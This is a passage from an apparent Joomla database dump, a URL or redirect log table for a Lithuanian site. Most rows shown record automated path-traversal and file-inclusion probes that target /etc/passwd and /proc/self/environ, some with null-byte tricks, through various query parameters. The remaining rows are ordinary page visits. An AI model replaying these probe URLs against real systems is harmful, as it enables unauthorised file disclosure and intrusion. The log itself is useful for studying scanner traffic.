00:00:00'),(173,'http://tytuvenai.eu/index.php?option=/proc/self/environ\0&tmpl=component&link=3848b2ae3d0f80d389fa7980bf0b23128f51b256','','','',1,0,'2014-05-16 21:48:03','0000-00-00 00:00:00'),(174,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../proc/self/environ&task=click&bid=11','','','',1,0,'2014-05-16 21:48:03','0000-00-00 00:00:00'),(175,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../proc/self/environ&tmpl=component&link=3848b2ae3d0f80d389fa7980bf0b23128f51b256','','','',1,0,'2014-05-16 21:48:03','0000-00-00 00:00:00'),(176,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../proc/self/environ&tmpl=component&link=3848b2ae3d0f80d389fa7980bf0b23128f51b256','','','',1,0,'2014-05-16 21:48:04','0000-00-00 00:00:00'),(177,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../proc/self/environ\0&tmpl=component&link=3848b2ae3d0f80d389fa7980bf0b23128f51b256','','','',1,0,'2014-05-16 21:48:04','0000-00-00 00:00:00'),(178,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../proc/self/environ\0&tmpl=component&link=3848b2ae3d0f80d389fa7980bf0b23128f51b256','','','',1,0,'2014-05-16 21:48:05','0000-00-00 00:00:00'),(179,'http://tytuvenai.eu/index.php?option=/proc/self/environ&view=category&layout=blog&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:05','0000-00-00 00:00:00'),(180,'http://tytuvenai.eu/index.php?option=/etc/passwd&tmpl=component&link=3848b2ae3d0f80d389fa7980bf0b23128f51b256','','','',1,0,'2014-05-16 21:48:05','0000-00-00 00:00:00'),(181,'http://tytuvenai.eu/index.php?option=/proc/self/environ&view=article&id=84&Itemid=79','','','',1,0,'2014-05-16 21:48:05','0000-00-00 00:00:00'),(182,'http://tytuvenai.eu/index.php?option=/proc/self/environ\0&view=category&layout=blog&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:05','0000-00-00 00:00:00'),(183,'http://tytuvenai.eu/index.php?option=/etc/passwd\0&tmpl=component&link=3848b2ae3d0f80d389fa7980bf0b23128f51b256','','','',1,0,'2014-05-16 21:48:06','0000-00-00 00:00:00'),(184,'http://tytuvenai.eu/index.php?option=/proc/self/environ\0&view=article&id=84&Itemid=79','','','',1,0,'2014-05-16 21:48:06','0000-00-00 00:00:00'),(185,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../proc/self/environ&view=category&layout=blog&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:06','0000-00-00 00:00:00'),(186,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../etc/passwd&tmpl=component&link=3848b2ae3d0f80d389fa7980bf0b23128f51b256','','','',1,0,'2014-05-16 21:48:06','0000-00-00 00:00:00'),(187,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../proc/self/environ&view=article&id=84&Itemid=79','','','',1,0,'2014-05-16 21:48:06','0000-00-00 00:00:00'),(188,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../proc/self/environ&view=category&layout=blog&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:06','0000-00-00 00:00:00'),(189,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../etc/passwd&tmpl=component&link=3848b2ae3d0f80d389fa7980bf0b23128f51b256','','','',1,0,'2014-05-16 21:48:07','0000-00-00 00:00:00'),(190,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../proc/self/environ&task=click&bid=11','','','',1,0,'2014-05-16 21:48:07','0000-00-00 00:00:00'),(191,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../proc/self/environ\0&view=category&layout=blog&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:07','0000-00-00 00:00:00'),(192,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../proc/self/environ&view=article&id=84&Itemid=79','','','',1,0,'2014-05-16 21:48:07','0000-00-00 00:00:00'),(193,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../etc/passwd\0&tmpl=component&link=3848b2ae3d0f80d389fa7980bf0b23128f51b256','','','',1,0,'2014-05-16 21:48:08','0000-00-00 00:00:00'),(194,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../proc/self/environ\0&task=click&bid=11','','','',1,0,'2014-05-16 21:48:08','0000-00-00 00:00:00'),(195,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../proc/self/environ\0&view=category&layout=blog&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:08','0000-00-00 00:00:00'),(196,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../proc/self/environ\0&view=article&id=84&Itemid=79','','','',1,0,'2014-05-16 21:48:08','0000-00-00 00:00:00'),(197,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../proc/self/environ\0&task=click&bid=11','','','',1,0,'2014-05-16 21:48:08','0000-00-00 00:00:00'),(198,'http://tytuvenai.eu/index.php?option=/etc/passwd&view=category&layout=blog&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:08','0000-00-00 00:00:00'),(199,'http://tytuvenai.eu/index.php?view=article&catid=/proc/self/environ&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:08','0000-00-00 00:00:00'),(200,'http://tytuvenai.eu/index.php?option=/etc/passwd&task=click&bid=11','','','',1,0,'2014-05-16 21:48:09','0000-00-00 00:00:00'),(201,'http://tytuvenai.eu/index.php?view=article&catid=/proc/self/environ\0&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:09','0000-00-00 00:00:00'),(202,'http://tytuvenai.eu/index.php?option=/etc/passwd\0&task=click&bid=11','','','',1,0,'2014-05-16 21:48:09','0000-00-00 00:00:00'),(203,'http://tytuvenai.eu/index.php?view=article&catid=../../../../../../../../../../proc/self/environ&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:09','0000-00-00 00:00:00'),(204,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../etc/passwd&task=click&bid=11','','','',1,0,'2014-05-16 21:48:10','0000-00-00 00:00:00'),(205,'http://tytuvenai.eu/index.php?view=article&catid=/../../../../../../../../../../proc/self/environ&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:10','0000-00-00 00:00:00'),(206,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../etc/passwd&task=click&bid=11','','','',1,0,'2014-05-16 21:48:10','0000-00-00 00:00:00'),(207,'http://tytuvenai.eu/index.php?view=article&catid=../../../../../../../../../../proc/self/environ\0&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:10','0000-00-00 00:00:00'),(208,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../etc/passwd\0&task=click&bid=11','','','',1,0,'2014-05-16 21:48:11','0000-00-00 00:00:00'),(209,'http://tytuvenai.eu/index.php?view=article&catid=/../../../../../../../../../../proc/self/environ\0&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:11','0000-00-00 00:00:00'),(210,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../etc/passwd\0&tmpl=component&link=3848b2ae3d0f80d389fa7980bf0b23128f51b256','','','',1,0,'2014-05-16 21:48:11','0000-00-00 00:00:00'),(211,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../etc/passwd\0&task=click&bid=11','','','',1,0,'2014-05-16 21:48:11','0000-00-00 00:00:00'),(212,'http://tytuvenai.eu/index.php?view=article&catid=/etc/passwd&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:11','0000-00-00 00:00:00'),(213,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../proc/self/environ\0&view=article&id=84&Itemid=79','','','',1,0,'2014-05-16 21:48:11','0000-00-00 00:00:00'),(214,'http://tytuvenai.eu/index.php?view=article&id=/proc/self/environ&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:11','0000-00-00 00:00:00'),(215,'http://tytuvenai.eu/index.php?view=article&catid=/etc/passwd\0&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:12','0000-00-00 00:00:00'),(216,'http://tytuvenai.eu/index.php?option=/etc/passwd&view=article&id=84&Itemid=79','','','',1,0,'2014-05-16 21:48:12','0000-00-00 00:00:00'),(217,'http://tytuvenai.eu/index.php?view=article&id=/proc/self/environ\0&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:12','0000-00-00 00:00:00'),(218,'http://tytuvenai.eu/index.php?view=article&catid=../../../../../../../../../../etc/passwd&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:12','0000-00-00 00:00:00'),(219,'http://tytuvenai.eu/index.php?option=/etc/passwd\0&view=article&id=84&Itemid=79','','','',1,0,'2014-05-16 21:48:12','0000-00-00 00:00:00'),(220,'http://tytuvenai.eu/index.php?view=article&id=../../../../../../../../../../proc/self/environ&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:12','0000-00-00 00:00:00'),(221,'http://tytuvenai.eu/index.php?view=article&catid=/../../../../../../../../../../etc/passwd&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:13','0000-00-00 00:00:00'),(222,'http://tytuvenai.eu/index.php?view=article&id=/../../../../../../../../../../proc/self/environ&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:13','0000-00-00 00:00:00'),(223,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../etc/passwd&view=article&id=84&Itemid=79','','','',1,0,'2014-05-16 21:48:13','0000-00-00 00:00:00'),(224,'http://tytuvenai.eu/index.php?view=article&catid=../../../../../../../../../../etc/passwd\0&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:13','0000-00-00 00:00:00'),(225,'http://tytuvenai.eu/index.php?option=/etc/passwd\0&view=category&layout=blog&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:14','0000-00-00 00:00:00'),(226,'http://tytuvenai.eu/index.php?view=article&id=../../../../../../../../../../proc/self/environ\0&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:14','0000-00-00 00:00:00'),(227,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../etc/passwd&view=article&id=84&Itemid=79','','','',1,0,'2014-05-16 21:48:14','0000-00-00 00:00:00'),(228,'http://tytuvenai.eu/index.php?view=article&catid=/../../../../../../../../../../etc/passwd\0&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:14','0000-00-00 00:00:00'),(229,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../etc/passwd&view=category&layout=blog&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:14','0000-00-00 00:00:00'),(230,'http://tytuvenai.eu/index.php?view=article&id=/../../../../../../../../../../proc/self/environ\0&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:14','0000-00-00 00:00:00'),(231,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../etc/passwd\0&view=article&id=84&Itemid=79','','','',1,0,'2014-05-16 21:48:14','0000-00-00 00:00:00'),(232,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/proc/self/environ&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:14','0000-00-00 00:00:00'),(233,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../etc/passwd&view=category&layout=blog&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:15','0000-00-00 00:00:00'),(234,'http://tytuvenai.eu/index.php?view=article&id=/etc/passwd&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:15','0000-00-00 00:00:00'),(235,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../etc/passwd\0&view=article&id=84&Itemid=79','','','',1,0,'2014-05-16 21:48:15','0000-00-00 00:00:00'),(236,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/proc/self/environ\0&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:15','0000-00-00 00:00:00'),(237,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../etc/passwd\0&view=category&layout=blog&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:15','0000-00-00 00:00:00'),(238,'http://tytuvenai.eu/index.php?view=article&id=/etc/passwd\0&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:15','0000-00-00 00:00:00'),(239,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../etc/passwd\0&view=category&layout=blog&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:16','0000-00-00 00:00:00'),(240,'http://tytuvenai.eu/index.php?view=article&id=../../../../../../../../../../etc/passwd&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:16','0000-00-00 00:00:00'),(241,'http://tytuvenai.eu/index.php?view=article&id=/../../../../../../../../../../etc/passwd&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:16','0000-00-00 00:00:00'),(242,'http://tytuvenai.eu/index.php?view=article&id=../../../../../../../../../../etc/passwd\0&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:17','0000-00-00 00:00:00'),(243,'http://tytuvenai.eu/index.php?view=article&id=/../../../../../../../../../../etc/passwd\0&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:17','0000-00-00 00:00:00'),(244,'http://tytuvenai.eu/index.php?view=article&catid=/proc/self/environ\0&id=95:kvieiame-rengin&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:18','0000-00-00 00:00:00'),(245,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=../../../../../../../../../../proc/self/environ&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:18','0000-00-00 00:00:00'),(246,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/../../../../../../../../../../proc/self/environ&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:19','0000-00-00 00:00:00'),(247,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=../../../../../../../../../../proc/self/environ\0&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:19','0000-00-00 00:00:00'),(248,'http://tytuvenai.eu/index.php?view=article&catid=../../../../../../../../../../proc/self/environ\0&id=95:kvieiame-rengin&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:19','0000-00-00 00:00:00'),(249,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/../../../../../../../../../../proc/self/environ\0&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:20','0000-00-00 00:00:00'),(250,'http://tytuvenai.eu/index.php?view=article&catid=/../../../../../../../../../../proc/self/environ\0&id=95:kvieiame-rengin&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:20','0000-00-00 00:00:00'),(251,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/etc/passwd&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:20','0000-00-00 00:00:00'),(252,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/etc/passwd\0&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:20','0000-00-00 00:00:00'),(253,'http://tytuvenai.eu/index.php?view=article&catid=/etc/passwd\0&id=95:kvieiame-rengin&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:21','0000-00-00 00:00:00'),(254,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=../../../../../../../../../../etc/passwd&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:21','0000-00-00 00:00:00'),(255,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=/proc/self/environ&Itemid=79','','','',1,0,'2014-05-16 21:48:21','0000-00-00 00:00:00'),(256,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/../../../../../../../../../../etc/passwd&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:21','0000-00-00 00:00:00'),(257,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=/proc/self/environ&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:21','0000-00-00 00:00:00'),(258,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=/proc/self/environ\0&Itemid=79','','','',1,0,'2014-05-16 21:48:21','0000-00-00 00:00:00'),(259,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=../../../../../../../../../../etc/passwd\0&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:22','0000-00-00 00:00:00'),(260,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=../../../../../../../../../../proc/self/environ&Itemid=79','','','',1,0,'2014-05-16 21:48:22','0000-00-00 00:00:00'),(261,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=/proc/self/environ\0&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:22','0000-00-00 00:00:00'),(262,'http://tytuvenai.eu/index.php?view=article&catid=../../../../../../../../../../etc/passwd\0&id=95:kvieiame-rengin&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:22','0000-00-00 00:00:00'),(263,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/../../../../../../../../../../etc/passwd\0&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:22','0000-00-00 00:00:00'),(264,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=/../../../../../../../../../../proc/self/environ&Itemid=79','','','',1,0,'2014-05-16 21:48:22','0000-00-00 00:00:00'),(265,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=../../../../../../../../../../proc/self/environ&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:22','0000-00-00 00:00:00'),(266,'http://tytuvenai.eu/index.php?view=article&catid=/../../../../../../../../../../etc/passwd\0&id=95:kvieiame-rengin&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:22','0000-00-00 00:00:00'),(267,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=/proc/self/environ&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:23','0000-00-00 00:00:00'),(268,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=../../../../../../../../../../proc/self/environ\0&Itemid=79','','','',1,0,'2014-05-16 21:48:23','0000-00-00 00:00:00'),(269,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/proc/self/environ&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:23','0000-00-00 00:00:00'),(270,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=/../../../../../../../../../../proc/self/environ&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:23','0000-00-00 00:00:00'),(271,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=/proc/self/environ\0&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:23','0000-00-00 00:00:00'),(272,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=/../../../../../../../../../../proc/self/environ\0&Itemid=79','','','',1,0,'2014-05-16 21:48:23','0000-00-00 00:00:00'),(273,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/proc/self/environ\0&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:23','0000-00-00 00:00:00'),(274,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=../../../../../../../../../../proc/self/environ\0&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:23','0000-00-00 00:00:00'),(275,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=../../../../../../../../../../proc/self/environ&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:24','0000-00-00 00:00:00'),(276,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=/etc/passwd&Itemid=79','','','',1,0,'2014-05-16 21:48:24','0000-00-00 00:00:00'),(277,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=../../../../../../../../../../proc/self/environ&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:24','0000-00-00 00:00:00'),(278,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=/../../../../../../../../../../proc/self/environ&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:24','0000-00-00 00:00:00'),(279,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=/../../../../../../../../../../proc/self/environ\0&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:24','0000-00-00 00:00:00'),(280,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=/etc/passwd\0&Itemid=79','','','',1,0,'2014-05-16 21:48:24','0000-00-00 00:00:00'),(281,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/../../../../../../../../../../proc/self/environ&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:25','0000-00-00 00:00:00'),(282,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=../../../../../../../../../../proc/self/environ\0&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:25','0000-00-00 00:00:00'),(283,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=/etc/passwd&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:25','0000-00-00 00:00:00'),(284,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=../../../../../../../../../../proc/self/environ\0&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:25','0000-00-00 00:00:00'),(285,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=../../../../../../../../../../etc/passwd&Itemid=79','','','',1,0,'2014-05-16 21:48:25','0000-00-00 00:00:00'),(286,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=/../../../../../../../../../../proc/self/environ\0&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:26','0000-00-00 00:00:00'),(287,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=/../../../../../../../../../../etc/passwd&Itemid=79','','','',1,0,'2014-05-16 21:48:26','0000-00-00 00:00:00'),(288,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/../../../../../../../../../../proc/self/environ\0&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:26','0000-00-00 00:00:00'),(289,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=/etc/passwd\0&id=1&Itemid=53','','','',1,0,'2014-05-16 21:48:26','0000-00-00 00:00:00'),(290,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/etc/passwd&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:26','0000-00-00 00:00:00'),(291,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=../../../../../../../../../../etc/passwd\0&Itemid=79','','','',1,0,'2014-05-16 21:48:26','0000-00-00 00:00:00'),(292,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/etc/passwd\0&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:27','0000-00-00 00:00:00'),(293,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=/../../../../../../../../../../etc/passwd\0&Itemid=79','','','',1,0,'2014-05-16 21:48:27','0000-00-00 00:00:00'),(294,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=../../../../../../../../../../etc/passwd&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:27','0000-00-00 00:00:00'),(295,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/../../../../../../../../../../etc/passwd&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:28','0000-00-00 00:00:00'),(296,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=../../../../../../../../../../etc/passwd\0&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:28','0000-00-00 00:00:00'),(297,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=/../../../../../../../../../../etc/passwd\0&tmpl=component&print=1&layout=default&page=&option=com_content','','','',1,0,'2014-05-16 21:48:28','0000-00-00 00:00:00'),(298,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=/etc/passwd&print=1&layout=default&page=','','','',1,0,'2014-05-16 21:48:29','0000-00-00 00:00:00'),(299,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=84&Itemid=/proc/self/environ','','','',1,0,'2014-05-16 21:48:30','0000-00-00 00:00:00'),(300,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=84&Itemid=/proc/self/environ\0','','','',1,0,'2014-05-16 21:48:31','0000-00-00 00:00:00'),(301,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=84&Itemid=../../../../../../../../../../proc/self/environ','','','',1,0,'2014-05-16 21:48:31','0000-00-00 00:00:00'),(302,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=84&Itemid=/../../../../../../../../../../proc/self/environ','','','',1,0,'2014-05-16 21:48:31','0000-00-00 00:00:00'),(303,'http://tytuvenai.eu/index.php?Itemid=74&id=32&option=com_content&view=category','','','',6,0,'2014-05-16 22:48:31','0000-00-00 00:00:00'),(304,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=100:tytuvn-banyios-ir-vienuolyno-ansamblis&catid=1:paskutinesnaujienos&Itemid=53','','','',6,0,'2014-05-17 03:40:00','0000-00-00 00:00:00'),(305,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=1','','','',13,0,'2014-05-17 06:17:28','0000-00-00 00:00:00'),(306,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=12','','','',14,0,'2014-05-17 06:17:35','0000-00-00 00:00:00'),(307,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=52:advento-sekmadieniai&catid=1:paskutinesnaujienos&Itemid=53','','','',32,0,'2014-05-17 06:17:44','0000-00-00 00:00:00'),(308,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=10','','','',25,0,'2014-05-17 06:17:51','0000-00-00 00:00:00'),(309,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=47:skaitymai-kapinese&catid=1:paskutinesnaujienos&Itemid=53','','','',27,0,'2014-05-17 06:19:22','0000-00-00 00:00:00'),(310,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=11','','','',15,0,'2014-05-17 06:34:05','0000-00-00 00:00:00'),(311,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=53&Itemid=56','','','',16,0,'2014-05-17 06:34:08','0000-00-00 00:00:00'),(312,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=97:pasirayta-finansavimo-sutartis-dl-tytuvn-banyios-ii-etapo-projekto-bei-projekto-rangos-darb-sutartis&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',11,0,'2014-05-17 06:58:26','0000-00-00 00:00:00'),(313,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57','','','',24,0,'2014-05-17 06:59:47','0000-00-00 00:00:00'),(314,'http://tytuvenai.eu/index.php?option=com_poll&id=15:kokios-informacijos-iekote','','','',3,0,'2014-05-17 07:41:53','0000-00-00 00:00:00'),(315,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=8','','','',11,0,'2014-05-17 13:26:43','0000-00-00 00:00:00'),(316,'http://tytuvenai.eu/index.php?Itemid=37&catid=32:turizmas&id=55:angelo-gele&option=com_content&view=article','','','',4,0,'2014-05-17 23:46:29','0000-00-00 00:00:00'),(317,'http://tytuvenai.eu/index.php?Itemid=37&id=32&layout=blog&option=com_content&view=category','','','',6,0,'2014-05-18 07:43:48','0000-00-00 